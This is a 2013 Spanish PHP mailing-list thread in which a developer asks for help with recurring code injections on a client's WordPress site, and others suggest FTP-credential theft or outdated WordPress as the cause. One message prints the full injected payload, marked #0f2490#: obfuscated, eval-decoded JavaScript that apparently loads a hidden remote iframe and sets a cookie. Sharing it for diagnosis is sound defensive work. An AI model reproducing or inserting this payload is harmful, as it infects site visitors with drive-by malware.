[Php-avanzado] Ayuda codigo malicioso Js

Unes Pacio unespac en gmail.com
Sab Ago 17 13:01:26 ART 2013 

Estoy de acuerdo con Leo, casi siempre la que está infectada es la
computadora de escritorio del cliente, o la maquina del cyber que uso para
conectarse la ultima vez, o incluso la computadora del webmaster, pero
tambien hay fallas de seguridad en versiones antiguas de wordpress que
pueden permitir eso, por lo tanto deberias asegurarte de mantenerlo siempre
actualizado y que no se muestre en la cabecera la version de wordpress que
tenes instalada. Salu2


El 15 de agosto de 2013 18:25, Juan Manuel P. <tucu_21 en hotmail.com>escribió:

> Este es el codigo que me copia en todos los archivos, ahora tambien lo
> encontre en algunos archivos htm, html o index.php
>
> #0f2490#
>
> if(empty($id)) { $id = "<script type=\"text/javascript\"
> language=\"javascript\"
> >z=\"y\";vz=\"d\"+\"oc\"+\"ument\";ps=\"s\"+\"plit\";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff=\"fr\"+\"omCh\"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v=\"0x\";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)[\"\x62od\"+z]}catch(q){a2=\"_\";}z=\"2d_73_82_7b_70_81_76_7c_7b_2d_86_7c_85_71_81_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_2d_83_6e_7f_2d_86_7c_85_71_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7f_72_6e_81_72_52_79_72_7a_72_7b_81_35_34_76_73_7f_6e_7a_72_34_36_48_1a_17_1a_17_2d_86_7c_85_71_81_3b_80_7f_70_2d_4a_2d_34_75_81_81_7d_47_3c_3c_75_6f_78_7c_7f_7d_80_3b_80_70_75_72_76_7f_7c_3b_71_72_3c_5f_59_74_66_4f_85_65_41_3b_7d_75_7d_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_7d_7c_80_76_81_76_7c_7b_2d_4a_2d_34_6e_6f_80_7c_79_82_81_72_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_70_7c_79_7c_7f_2d_4a_2d_34_45_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_75_72_76_74_75_81_2d_4a_2d_34_45_7d_85_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_84_76_71_81_75_2d_4a_2d_34_45_7d_85_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_79_72_73_81_2d_4a_2d_34_3e_3d_3d_3d_45_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_81_7c_7d_2d_4a_2d_34_3e_3d_3d_3d_45_34_48_1a_17_1a_17_2d_76_73_2d_35_2e_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_86_7c_85_71_81_34_36_36_2d_88_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_84_7f_76_81_72_35_34_49_7d_2d_76_71_4a_69_34_86_7c_85_71_81_69_34_2d_70_79_6e_80_80_4a_69_34_86_7c_85_71_81_3d_46_69_34_2d_4b_49_3c_7d_4b_34_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_86_7c_85_71_81_34_36_3b_6e_7d_7d_72_7b_71_50_75_76_79_71_35_86_7c_85_71_81_36_48_1a_17_2d_8a_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_60_72_81_50_7c_7c_78_76_72_35_70_7c_7c_78_76_72_5b_6e_7a_72_39_70_7c_7c_78_76_72_63_6e_79_82_72_39_7b_51_6e_86_80_39_7d_6e_81_75_36_2d_88_1a_17_2d_83_6e_7f_2d_81_7c_71_6e_86_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_83_6e_7f_2d_72_85_7d_76_7f_72_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_76_73_2d_35_7b_51_6e_86_80_4a_4a_7b_82_79_79_2d_89_89_2d_7b_51_6e_86_80_4a_4a_3d_36_2d_7b_51_6e_86_80_4a_3e_48_1a_17_2d_72_85_7d_76_7f_72_3b_80_72_81_61_76_7a_72_35_81_7c_71_6e_86_3b_74_72_81_61_76_7a_72_35_36_2d_38_2d_40_43_3d_3d_3d_3d_3d_37_3f_41_37_7b_51_6e_86_80_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_2d_4a_2d_70_7c_7c_78_76_72_5b_6e_7a_72_38_2f_4a_2f_38_72_80_70_6e_7d_72_35_70_7c_7c_78_76_72_63_6e_79_82_72_36_1a_17_2d_38_2d_2f_48_72_85_7d_76_7f_72_80_4a_2f_2d_38_2d_72_85_7d_76_7f_72_3b_81_7c_54_5a_61_60_81_7f_76_7b_74_35_36_2d_38_2d_35_35_7d_6e_81_75_36_2d_4c_2d_2f_48_2d_7d_6e_81_75_4a_2f_2d_38_2d_7d_6e_81_75_2d_47_2d_2f_2f_36_48_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_54_72_81_50_7c_7c_78_76_72_35_2d_7b_6e_7a_72_2d_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_7f_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_7b_6e_7a_72_2d_38_2d_2f_4a_2f_2d_36_48_1a_17_2d_83_6e_7f_2d_79_72_7b_2d_4a_2d_80_81_6e_7f_81_2d_38_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_38_2d_3e_48_1a_17_2d_76_73_2d_35_2d_35_2d_2e_80_81_6e_7f_81_2d_36_2d_33_33_1a_17_2d_35_2d_7b_6e_7a_72_2d_2e_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_3d_39_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_36_2d_36_2d_36_1a_17_2d_88_1a_17_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_8a_1a_17_2d_76_73_2d_35_2d_80_81_6e_7f_81_2d_4a_4a_2d_3a_3e_2d_36_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_83_6e_7f_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_2f_48_2f_39_2d_79_72_7b_2d_36_48_1a_17_2d_76_73_2d_35_2d_72_7b_71_2d_4a_4a_2d_3a_3e_2d_36_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_79_72_7b_74_81_75_48_1a_17_2d_7f_72_81_82_7f_7b_2d_82_7b_72_80_70_6e_7d_72_35_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_86_7c_85_71_81_3d_46_35_36_48_1a_17_8a_1a_17_8a\"[ps](a2);za=\"\";aa(\"arCode\");e(\"\"+za);}</script>";
> echo $id; }
>
> #/0f2490#
>
>
> *Piñeiro, Juan Manuel
> Aliweb - Desarrollo de Software
> Cel (0223) 155 704568
> Web www.aliweb.com.ar
> Mar del Plata | Argentina*
>
>
>
> > From: leonardot en pegasusnet.com.ar
> > To: php-avanzado en pato2.fi.mdp.edu.ar
> > Date: Thu, 15 Aug 2013 16:27:12 -0300
> > Subject: Re: [Php-avanzado] Ayuda codigo malicioso Js
>
> >
> > Hola Juan Manuel,
> >
> > esto es típico de cuando alguien que tiene configurado en su PC un
> > cliente FTP con la clave del sitio tiene un virus.
> > El virus se conecta vía FTP y modifica los scripts.
> >
> >
> > PD: la lista no tiene ninguna restricción de contenido y podés enviar
> > por acá el código malicioso. La única restricción es del tamaño del
> > mail. Te da algún error?
> >
> >
> > El jue, 15-08-2013 a las 00:59 -0300, Juan Manuel P. escribió:
> > > Buenas noches, quisiera hacer una consulta a la lista, para saber si
> > > alguien tiene alguna idea de donde puede provenir el problema.
> > >
> > > Tengo un cliente que tiene su sitio en wordpress, ya lo tenia cuando
> > > lo contacte y quizo seguir con esta plataforma, por lo que le
> > > desarrolle una plantilla (en una primera etapa de la pagina principal,
> > > estamos con una segunda etapa de la vista interna del sitio).
> > >
> > > El problema me esta sucediendo desde hace una semana es que no
> > > entiendo como es que de repente se agrega codigo malicioso (codigo
> > > javascript que los antivirus lo detectan como virus), y aclaro que de
> > > repente porque de la nada he visto agregado codigo en el archivo
> > > header.php y he visto como se borra codigo que yo mismo habia escrito
> > > en ese archivo.
> > >
> > > Hoy, a diferencia de la semana pasada, me encontre con una marca que
> > > me sorprendio y la google pero no encontre la fuente del problema.
> > >
> > > No dejo el codigo que se inserta en cada uno de estos archivos (porque
> > > se copia en cada una de los archivos header.php de TODAS las
> > > plantillas instaladas) porque la lista no me permite pero empieza con
> > > esta etiqueta #0f2490# el marcado de donde inicia y donde termina.
> > >
> > > Piñeiro, Juan Manuel
> > > Aliweb - Desarrollo de Software
> > > Cel (0223) 155 704568
> > > Web www.aliweb.com.ar
> > > Mar del Plata | Argentina
> > > _______________________________________________
> > > Php-avanzado mailing list
> > > Php-avanzado en pato2.fi.mdp.edu.ar
> > > http://www3.fi.mdp.edu.ar/cgi-bin/mailman/listinfo/php-avanzado
> >
> > --
> > Leonardo Tadei
> > leonardot en pegasusnet.com.ar
> > Web: http://leonardo.tadei.com.ar
> > Firma pública: http://www.pegasusnet.com.ar/LeonardoTadei-public.key
> >
> > _______________________________________________
> > Php-avanzado mailing list
> > Php-avanzado en pato2.fi.mdp.edu.ar
> > http://www3.fi.mdp.edu.ar/cgi-bin/mailman/listinfo/php-avanzado
>
> _______________________________________________
> Php-avanzado mailing list
> Php-avanzado en pato2.fi.mdp.edu.ar
> http://www3.fi.mdp.edu.ar/cgi-bin/mailman/listinfo/php-avanzado
>
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://www3.fi.mdp.edu.ar/pipermail/php-avanzado/attachments/20130817/9bd254ff/attachment.html>

Más información sobre la lista de distribución Php-avanzado